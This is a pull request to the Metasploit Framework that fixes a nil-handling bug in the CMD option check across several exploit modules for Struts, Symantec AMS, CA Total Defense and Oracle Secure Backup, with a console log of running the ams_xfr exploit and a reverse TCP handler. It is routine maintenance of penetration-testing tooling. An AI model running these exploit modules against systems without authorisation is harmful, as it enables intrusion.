### PR TITLE
fix ams_xfr.rb - NoMethodError undefined method 'empty?' for nil:NilC…

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if not datastore['CMD'].empty?
+    if !datastore['CMD'].blank?
       print_status("Executing user supplied command")
       execute_command(datastore['CMD'])
       return

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if not datastore['CMD'].empty?
+    if !datastore['CMD'].blank?
       print_status("Executing user supplied command")
       execute_command(datastore['CMD'])
       return

--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
 
-    if not datastore['CMD'].empty?
+    if !datastore['CMD'].blank?
       print_status("Executing command '#{datastore['CMD']}'")
       execute_command(datastore['CMD'])
       return
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
         windows_stager
       else
         fail_with(Failure::Unknown, 'Target not supported.')
-      end
+    end
 
     handler
 

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    execute_cmdstager({ :temp => '.', :cgifname => exe_fname })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
 
-    if not datastore['CMD'].empty?
+    if not (datastore['CMD'].nil? || datastore['CMD'].empty?)
       print_status("Executing command '#{datastore['CMD']}'")
       execute_command(datastore['CMD'])
       return
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
         windows_stager
       else
         fail_with(Failure::Unknown, 'Target not supported.')
-      end
+    end
 
     handler
 

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -92,8 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
-    if not (datastore['CMD'].nil? || datastore['CMD'].empty?)
+    if !datastore['CMD'].blank?
       print_status("Executing command '#{datastore['CMD']}'")
       execute_command(datastore['CMD'])
       return

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
 
-    if not datastore['CMD'].empty?
+    if !datastore['CMD'].blank?
       print_status("Executing command '#{datastore['CMD']}'")
       execute_command(datastore['CMD'])
       return

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
 
-    if not datastore['CMD'].empty?
+    if !datastore['CMD'].blank?
       print_status("Executing command '#{datastore['CMD']}'")
       execute_command(datastore['CMD'])
       return


### PR DESCRIPTION
@digininja fix issue https://github.com/rapid7/metasploit-framework/issues/6888
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/windows/antivirus/ams_xfr`
- [x] `set RHOST 192.168.24.1`
- [x] `unset CMD` 
- [x] `run`

```
msf exploit(ams_xfr) > unset CMD
Unsetting CMD...
msf exploit(ams_xfr) > run

[*] Started reverse TCP handler on 192.168.24.139:4444
[*] 192.168.24.1:12174 - Sending request to 192.168.24.1:12174
[-] 192.168.24.1:12174 - Exploit failed: Errno::EACCES Permission denied - bind(2) for [::]:69
[*] Exploit completed, but no session was created.
```
